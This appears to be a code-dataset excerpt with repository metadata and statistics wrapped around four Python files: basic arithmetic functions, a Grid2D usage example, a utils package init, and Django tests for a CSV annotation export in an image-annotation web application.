|
[
"MIT"
] | null | null | null |
def add_numbers(num1, num2):
return num1 + num2
def subtract_numbers(num1, num2):
return num1 - num2
def multiply_numbers(num1, num2):
return num1 * num2
def divide_numbers(num1, num2):
return num1 / num2
| 18.230769
| 34
| 0.662447
| 32
| 237
| 4.78125
| 0.28125
| 0.418301
| 0.392157
| 0.54902
| 0.816993
| 0.816993
| 0.627451
| 0
| 0
| 0
| 0
| 0.090395
| 0.253165
| 237
| 12
| 35
| 19.75
| 0.774011
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
6392722bd5525b0311d5259fc6ed905542a05288
| 798
|
py
|
Python
|
examples/grid2d.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
examples/grid2d.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
examples/grid2d.py
|
eddy-ilg/itypes
|
eaf1c4a86576c77caa34148c0fdc6b2e012119ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
from itypes import Grid2D
g = Grid2D(none_in_range=True, none_outside_range=True)
g[1, 2] = "x"
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')
print(f'g[0, 0] = {g[0,0]}')
print(f'g[1, 2] = {g[1,2]}')
print(f'g[2, 2] = {g[2,2]}')
g[2, 2] = "y"
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')
print(f'g[0, 0] = {g[0,0]}')
print(f'g[1, 2] = {g[1,1]}')
print(f'g[2, 2] = {g[2,2]}')
del g[2, 2]
print(f'min_col={g.min_col()} max_col={g.max_col()} num_cols={g.num_cols()} '
f'min_row={g.min_row()} max_row={g.max_row()} num_rows={g.num_rows()}')
| 26.6
| 77
| 0.592732
| 177
| 798
| 2.446328
| 0.163842
| 0.124711
| 0.096998
| 0.083141
| 0.785219
| 0.785219
| 0.778291
| 0.778291
| 0.722864
| 0.722864
| 0
| 0.046942
| 0.119048
| 798
| 29
| 78
| 27.517241
| 0.56899
| 0.026316
| 0
| 0.588235
| 0
| 0
| 0.664516
| 0.503226
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.058824
| 0
| 0.058824
| 0.529412
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
895e66ff4ad74bf41e6e03be1c347525eca98c1f
| 200
|
py
|
Python
|
utils/__init__.py
|
florianthonig/listen-attend-and-spell
|
218dd4f200cd564d3052c550dbbfe1f2cd836008
|
[
"Apache-2.0"
] | 96
|
2018-06-06T08:01:37.000Z
|
2021-10-06T03:40:00.000Z
|
utils/__init__.py
|
florianthonig/listen-attend-and-spell
|
218dd4f200cd564d3052c550dbbfe1f2cd836008
|
[
"Apache-2.0"
] | 10
|
2018-06-28T02:33:14.000Z
|
2019-07-08T07:22:29.000Z
|
utils/__init__.py
|
florianthonig/listen-attend-and-spell
|
218dd4f200cd564d3052c550dbbfe1f2cd836008
|
[
"Apache-2.0"
] | 37
|
2018-08-09T16:42:28.000Z
|
2021-10-21T03:42:59.000Z
|
from utils.dataset_utils import *
from utils.iterator_utils import *
from utils.vocab_utils import *
from utils.metrics_utils import *
from utils.image_utils import *
from utils.params_utils import *
| 28.571429
| 34
| 0.82
| 30
| 200
| 5.266667
| 0.3
| 0.341772
| 0.474684
| 0.632911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 200
| 6
| 35
| 33.333333
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8962e429da829e898ea84224366fa3d865b05e5d
| 31,664
|
py
|
Python
|
project/export/tests/test_annotations_csv.py
|
beijbom/coralnet
|
c3f4a44eeb60cb41a079329a0068dc8b34096e89
|
[
"BSD-2-Clause"
] | 31
|
2019-12-08T14:22:52.000Z
|
2021-12-27T04:58:12.000Z
|
project/export/tests/test_annotations_csv.py
|
beijbom/coralnet
|
c3f4a44eeb60cb41a079329a0068dc8b34096e89
|
[
"BSD-2-Clause"
] | 193
|
2019-12-07T23:27:43.000Z
|
2022-03-05T08:05:46.000Z
|
project/export/tests/test_annotations_csv.py
|
beijbom/coralnet
|
c3f4a44eeb60cb41a079329a0068dc8b34096e89
|
[
"BSD-2-Clause"
] | null | null | null |
import datetime
from django.core.files.base import ContentFile
from django.shortcuts import resolve_url
from django.test import override_settings
from django.urls import reverse
from annotations.models import Annotation
from export.tests.utils import BaseExportTest
from images.model_utils import PointGen
from lib.tests.utils import BasePermissionTest
from upload.tests.utils import UploadAnnotationsTestMixin
class PermissionTest(BasePermissionTest):
def test_annotations(self):
url = reverse('export_annotations', args=[self.source.pk])
self.source_to_private()
self.assertPermissionLevel(
url, self.SOURCE_VIEW, content_type='text/csv')
self.source_to_public()
self.assertPermissionLevel(
url, self.SIGNED_IN, content_type='text/csv',
deny_type=self.REQUIRE_LOGIN)
class ImageSetTest(BaseExportTest):
"""Test annotations export to CSV for different kinds of image subsets."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
# Uniform grid gives us consistent point locations.
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=2,
)
cls.labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, cls.labels)
def test_all_images_single(self):
"""Export for 1 out of 1 images."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
post_data = self.default_search_params.copy()
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,A',
'1.jpg,149,299,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_all_images_multiple(self):
"""Export for 3 out of 3 images."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.img2 = self.upload_image(
self.user, self.source,
dict(filename='2.jpg', width=400, height=400))
self.img3 = self.upload_image(
self.user, self.source,
dict(filename='3.jpg', width=400, height=200))
self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
post_data = self.default_search_params.copy()
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,A',
'1.jpg,149,299,B',
'2.jpg,199,99,B',
'2.jpg,199,299,A',
'3.jpg,99,99,B',
'3.jpg,99,299,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_image_subset_by_metadata(self):
"""Export for some, but not all, images."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.img2 = self.upload_image(
self.user, self.source,
dict(filename='2.jpg', width=400, height=400))
self.img3 = self.upload_image(
self.user, self.source,
dict(filename='3.jpg', width=400, height=200))
self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
self.img1.metadata.aux1 = 'X'
self.img1.metadata.save()
self.img2.metadata.aux1 = 'Y'
self.img2.metadata.save()
self.img3.metadata.aux1 = 'X'
self.img3.metadata.save()
post_data = self.default_search_params.copy()
post_data['aux1'] = 'X'
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,A',
'1.jpg,149,299,B',
'3.jpg,99,99,B',
'3.jpg,99,299,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_image_subset_by_annotation_status(self):
"""Export for some, but not all, images. Different search criteria.
Just a sanity check to ensure the image filtering is as complete
as it should be."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.img2 = self.upload_image(
self.user, self.source,
dict(filename='2.jpg', width=400, height=400))
self.img3 = self.upload_image(
self.user, self.source,
dict(filename='3.jpg', width=400, height=200))
robot = self.create_robot(self.source)
self.add_robot_annotations(robot, self.img1, {1: 'A', 2: 'A'})
self.add_robot_annotations(robot, self.img2, {1: 'A', 2: 'A'})
self.add_robot_annotations(robot, self.img3, {1: 'A', 2: 'A'})
# Only images 2 and 3 become confirmed
self.add_annotations(self.user, self.img2, {1: 'B', 2: 'A'})
self.add_annotations(self.user, self.img3, {1: 'B', 2: 'B'})
post_data = self.default_search_params.copy()
post_data['annotation_status'] = 'confirmed'
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
'2.jpg,199,99,B',
'2.jpg,199,299,A',
'3.jpg,99,99,B',
'3.jpg,99,299,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_image_empty_set(self):
"""Export for 0 images."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
post_data = self.default_search_params.copy()
post_data['image_name'] = '5.jpg'
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_invalid_image_set_params(self):
self.upload_image(self.user, self.source)
post_data = self.default_search_params.copy()
post_data['photo_date_0'] = 'abc'
response = self.export_annotations(post_data)
# Display an error in HTML instead of serving CSV.
self.assertTrue(response['content-type'].startswith('text/html'))
self.assertContains(response, "Image-search parameters were invalid.")
def test_dont_get_other_sources_images(self):
"""Don't export for other sources' images."""
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
self.add_annotations(self.user, self.img1, {1: 'A', 2: 'B'})
source2 = self.create_source(
self.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=2)
self.create_labelset(self.user, source2, self.labels)
img2 = self.upload_image(self.user, source2, dict(filename='2.jpg'))
self.add_annotations(self.user, img2, {1: 'A', 2: 'B'})
post_data = self.default_search_params.copy()
response = self.export_annotations(post_data)
# Should have image 1, but not 2
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,A',
'1.jpg,149,299,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
class AnnotationStatusTest(BaseExportTest):
"""Test annotations export to CSV for images of various annotation
statuses."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=2,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
def test_not_annotated(self):
response = self.export_annotations(self.default_search_params)
expected_lines = [
'Name,Row,Column,Label',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_partially_annotated(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
response = self.export_annotations(self.default_search_params)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_fully_annotated(self):
self.add_annotations(self.user, self.img1, {1: 'B', 2: 'A'})
response = self.export_annotations(self.default_search_params)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,B',
'1.jpg,149,299,A',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_machine_annotated(self):
robot = self.create_robot(self.source)
self.add_robot_annotations(robot, self.img1, {1: 'B', 2: 'A'})
response = self.export_annotations(self.default_search_params)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,B',
'1.jpg,149,299,A',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_part_machine_part_manual(self):
robot = self.create_robot(self.source)
self.add_robot_annotations(robot, self.img1, {1: 'B', 2: 'A'})
self.add_annotations(self.user, self.img1, {2: 'A'})
response = self.export_annotations(self.default_search_params)
expected_lines = [
'Name,Row,Column,Label',
'1.jpg,149,99,B',
'1.jpg,149,299,A',
]
self.assert_csv_content_equal(response.content, expected_lines)
class AnnotatorInfoColumnsTest(BaseExportTest, UploadAnnotationsTestMixin):
"""Test the optional annotation info columns."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
def test_user_annotation(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['annotator_info']
response = self.export_annotations(post_data)
annotation_date = \
Annotation.objects.get(image=self.img1).annotation_date
date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
expected_lines = [
'Name,Row,Column,Label,Annotator,Date annotated',
'1.jpg,149,199,B,{username},{date}'.format(
username=self.user.username, date=date_str),
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_imported_annotation(self):
# Import an annotation
rows = [
['Name', 'Row', 'Column', 'Label'],
['1.jpg', 50, 70, 'B'],
]
csv_file = self.make_csv_file('A.csv', rows)
self.preview_csv_annotations(
self.user, self.source, csv_file)
self.upload_annotations(self.user, self.source)
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['annotator_info']
response = self.export_annotations(post_data)
annotation_date = \
Annotation.objects.get(image=self.img1).annotation_date
date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
expected_lines = [
'Name,Row,Column,Label,Annotator,Date annotated',
'1.jpg,50,70,B,Imported,{date}'.format(date=date_str),
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_machine_annotation(self):
robot = self.create_robot(self.source)
self.add_robot_annotations(robot, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['annotator_info']
response = self.export_annotations(post_data)
annotation_date = \
Annotation.objects.get(image=self.img1).annotation_date
date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
expected_lines = [
'Name,Row,Column,Label,Annotator,Date annotated',
'1.jpg,149,199,B,robot,{date}'.format(date=date_str),
]
self.assert_csv_content_equal(response.content, expected_lines)
class MachineSuggestionColumnsTest(BaseExportTest):
"""Test the optional machine suggestion columns."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
@override_settings(NBR_SCORES_PER_ANNOTATION=2)
def test_blank(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['machine_suggestions']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label'
',Machine suggestion 1,Machine confidence 1'
',Machine suggestion 2,Machine confidence 2',
'1.jpg,149,199,B,,,,',
]
self.assert_csv_content_equal(response.content, expected_lines)
@override_settings(NBR_SCORES_PER_ANNOTATION=2)
def test_all_suggestions_filled(self):
robot = self.create_robot(self.source)
# Normally we don't make assumptions on how add_robot_annotations()
# assigns confidences after the first one, but since we only have 2
# labels in the labelset, it should be safe to assume confidences of
# 60 and 40 if we pass a top score of 60.
self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['machine_suggestions']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label'
',Machine suggestion 1,Machine confidence 1'
',Machine suggestion 2,Machine confidence 2',
'1.jpg,149,199,B,B,60,A,40',
]
self.assert_csv_content_equal(response.content, expected_lines)
@override_settings(NBR_SCORES_PER_ANNOTATION=3)
def test_some_suggestions_filled(self):
robot = self.create_robot(self.source)
# As before, we're assuming this gets confidences of 60 and 40.
self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['machine_suggestions']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label'
',Machine suggestion 1,Machine confidence 1'
',Machine suggestion 2,Machine confidence 2'
',Machine suggestion 3,Machine confidence 3',
'1.jpg,149,199,B,B,60,A,40,,',
]
self.assert_csv_content_equal(response.content, expected_lines)
class MetadataAuxColumnsTest(BaseExportTest):
"""Test the optional aux. metadata columns."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
def test_blank(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_date_aux']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Date,Aux1,Aux2,Aux3,Aux4,Aux5,Row,Column,Label',
'1.jpg,,,,,,,149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_filled(self):
self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
self.img1.metadata.aux1 = "Site A"
self.img1.metadata.aux2 = "Transect 1-2"
self.img1.metadata.aux3 = "Quadrant 5"
self.img1.metadata.save()
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_date_aux']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Date,Aux1,Aux2,Aux3,Aux4,Aux5,Row,Column,Label',
'1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,,149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_named_aux_fields(self):
self.source.key1 = "Site"
self.source.key2 = "Transect"
self.source.key3 = "Quadrant"
self.source.save()
self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
self.img1.metadata.aux1 = "Site A"
self.img1.metadata.aux2 = "Transect 1-2"
self.img1.metadata.aux3 = "Quadrant 5"
self.img1.metadata.save()
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_date_aux']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Date,Site,Transect,Quadrant,Aux4,Aux5,Row,Column,Label',
'1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,,149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
class MetadataOtherColumnsTest(BaseExportTest):
"""Test the optional other metadata columns."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
def test_blank(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_other']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
',Water quality,Strobes,Framing gear used,White balance card'
',Comments,Row,Column,Label',
'1.jpg,,,,,,,,,,,,149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_filled(self):
self.img1.metadata.height_in_cm = 40
self.img1.metadata.latitude = "5.789"
self.img1.metadata.longitude = "-50"
self.img1.metadata.depth = "10m"
self.img1.metadata.camera = "Nikon"
self.img1.metadata.photographer = "John Doe"
self.img1.metadata.water_quality = "Clear"
self.img1.metadata.strobes = "White A"
self.img1.metadata.framing = "Framing set C"
self.img1.metadata.balance = "Card B"
self.img1.metadata.comments = "Here are\nsome comments."
self.img1.metadata.save()
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_other']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
',Water quality,Strobes,Framing gear used,White balance card'
',Comments,Row,Column,Label',
'1.jpg,40,5.789,-50,10m,Nikon,John Doe'
',Clear,White A,Framing set C,Card B'
',"Here are\nsome comments.",149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
class MoreOptionalColumnsCasesTest(BaseExportTest):
"""Test combinations of optional column sets, and invalid columns."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='1.jpg', width=400, height=300))
def test_both_metadata_column_sets(self):
self.source.key1 = "Site"
self.source.key2 = "Transect"
self.source.key3 = "Quadrant"
self.source.save()
self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
self.img1.metadata.aux1 = "Site A"
self.img1.metadata.aux2 = "Transect 1-2"
self.img1.metadata.aux3 = "Quadrant 5"
self.img1.metadata.height_in_cm = 40
self.img1.metadata.latitude = "5.789"
self.img1.metadata.longitude = "-50"
self.img1.metadata.depth = "10m"
self.img1.metadata.camera = "Nikon"
self.img1.metadata.photographer = "John Doe"
self.img1.metadata.water_quality = "Clear"
self.img1.metadata.strobes = "White A"
self.img1.metadata.framing = "Framing set C"
self.img1.metadata.balance = "Card B"
self.img1.metadata.comments = "Here are\nsome comments."
self.img1.metadata.save()
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['metadata_date_aux', 'metadata_other']
response = self.export_annotations(post_data)
expected_lines = [
'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
',Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
',Water quality,Strobes,Framing gear used,White balance card'
',Comments,Row,Column,Label',
'1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5'
',,,40,5.789,-50,10m,Nikon,John Doe'
',Clear,White A,Framing set C,Card B'
',"Here are\nsome comments.",149,199,B',
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_another_combination_of_two_sets(self):
self.source.key1 = "Site"
self.source.key2 = "Transect"
self.source.key3 = "Quadrant"
self.source.save()
self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
self.img1.metadata.aux1 = "Site A"
self.img1.metadata.aux2 = "Transect 1-2"
self.img1.metadata.aux3 = "Quadrant 5"
self.img1.metadata.save()
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['annotator_info', 'metadata_date_aux']
response = self.export_annotations(post_data)
annotation_date = \
Annotation.objects.get(image=self.img1).annotation_date
date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
expected_lines = [
'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
',Row,Column,Label,Annotator,Date annotated',
'1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,'
',149,199,B,{username},{date}'.format(
username=self.user.username, date=date_str),
]
self.assert_csv_content_equal(response.content, expected_lines)
@override_settings(NBR_SCORES_PER_ANNOTATION=2)
def test_all_sets(self):
self.source.key1 = "Site"
self.source.key2 = "Transect"
self.source.key3 = "Quadrant"
self.source.save()
self.img1.metadata.photo_date = datetime.date(2001, 2, 3)
self.img1.metadata.aux1 = "Site A"
self.img1.metadata.aux2 = "Transect 1-2"
self.img1.metadata.aux3 = "Quadrant 5"
self.img1.metadata.height_in_cm = 40
self.img1.metadata.latitude = "5.789"
self.img1.metadata.longitude = "-50"
self.img1.metadata.depth = "10m"
self.img1.metadata.camera = "Nikon"
self.img1.metadata.photographer = "John Doe"
self.img1.metadata.water_quality = "Clear"
self.img1.metadata.strobes = "White A"
self.img1.metadata.framing = "Framing set C"
self.img1.metadata.balance = "Card B"
self.img1.metadata.comments = "Here are\nsome comments."
self.img1.metadata.save()
robot = self.create_robot(self.source)
self.add_robot_annotations(robot, self.img1, {1: ('B', 60)})
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = [
'annotator_info', 'machine_suggestions',
'metadata_date_aux', 'metadata_other']
response = self.export_annotations(post_data)
annotation_date = \
Annotation.objects.get(image=self.img1).annotation_date
date_str = annotation_date.strftime('%Y-%m-%d %H:%M:%S+00:00')
expected_lines = [
'Name,Date,Site,Transect,Quadrant,Aux4,Aux5'
',Height (cm),Latitude,Longitude,Depth,Camera,Photographer'
',Water quality,Strobes,Framing gear used,White balance card'
',Comments,Row,Column,Label'
',Annotator,Date annotated'
',Machine suggestion 1,Machine confidence 1'
',Machine suggestion 2,Machine confidence 2',
'1.jpg,2001-02-03,Site A,Transect 1-2,Quadrant 5,,'
',40,5.789,-50,10m,Nikon,John Doe'
',Clear,White A,Framing set C,Card B'
',"Here are\nsome comments.",149,199,B'
',{username},{date},B,60,A,40'.format(
username=self.user.username, date=date_str),
]
self.assert_csv_content_equal(response.content, expected_lines)
def test_invalid_column_name(self):
self.add_annotations(self.user, self.img1, {1: 'B'})
post_data = self.default_search_params.copy()
post_data['optional_columns'] = ['jpg_files']
response = self.export_annotations(post_data)
# Display an error in HTML instead of serving CSV.
self.assertTrue(response['content-type'].startswith('text/html'))
self.assertContains(
response,
"Select a valid choice."
" jpg_files is not one of the available choices.")
class UnicodeTest(BaseExportTest):
"""Test that non-ASCII characters don't cause problems."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
# Unicode custom label code
local_label = cls.source.labelset.locallabel_set.get(code='B')
local_label.code = 'い'
local_label.save()
cls.img1 = cls.upload_image(
cls.user, cls.source,
dict(filename='あ.jpg', width=400, height=300))
def test(self):
self.add_annotations(self.user, self.img1, {1: 'い'})
post_data = self.default_search_params.copy()
response = self.export_annotations(post_data)
expected_lines = [
'Name,Row,Column,Label',
'あ.jpg,149,199,い',
]
self.assert_csv_content_equal(
response.content, expected_lines)
class UploadAndExportSameDataTest(BaseExportTest):
"""Test that we can upload a CSV and then export the exact same CSV."""
@classmethod
def setUpTestData(cls):
super().setUpTestData()
cls.user = cls.create_user()
cls.source = cls.create_source(
cls.user,
point_generation_type=PointGen.Types.UNIFORM,
number_of_cell_rows=1, number_of_cell_columns=1,
)
labels = cls.create_labels(cls.user, ['A', 'B'], 'GroupA')
cls.create_labelset(cls.user, cls.source, labels)
def test(self):
self.img1 = self.upload_image(
self.user, self.source,
dict(filename='1.jpg', width=400, height=300))
# Upload annotations
content = ''
csv_lines = [
'Name,Row,Column,Label',
'1.jpg,149,199,A',
]
for line in csv_lines:
content += (line + '\n')
csv_file = ContentFile(content, name='annotations.csv')
self.client.force_login(self.user)
self.client.post(
resolve_url('upload_annotations_csv_preview_ajax', self.source.pk),
{'csv_file': csv_file},
)
self.client.post(
resolve_url('upload_annotations_ajax', self.source.pk),
)
# Export annotations
post_data = self.default_search_params.copy()
response = self.export_annotations(post_data)
self.assert_csv_content_equal(response.content, csv_lines)
| 38.427184
| 79
| 0.622
| 3,957
| 31,664
| 4.801365
| 0.080364
| 0.042107
| 0.051371
| 0.035107
| 0.848676
| 0.839781
| 0.836044
| 0.822517
| 0.816727
| 0.8042
| 0
| 0.038195
| 0.251705
| 31,664
| 823
| 80
| 38.473876
| 0.763653
| 0.044404
| 0
| 0.738931
| 0
| 0.006107
| 0.156887
| 0.054861
| 0
| 0
| 0
| 0
| 0.050382
| 1
| 0.059542
| false
| 0
| 0.018321
| 0
| 0.09313
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
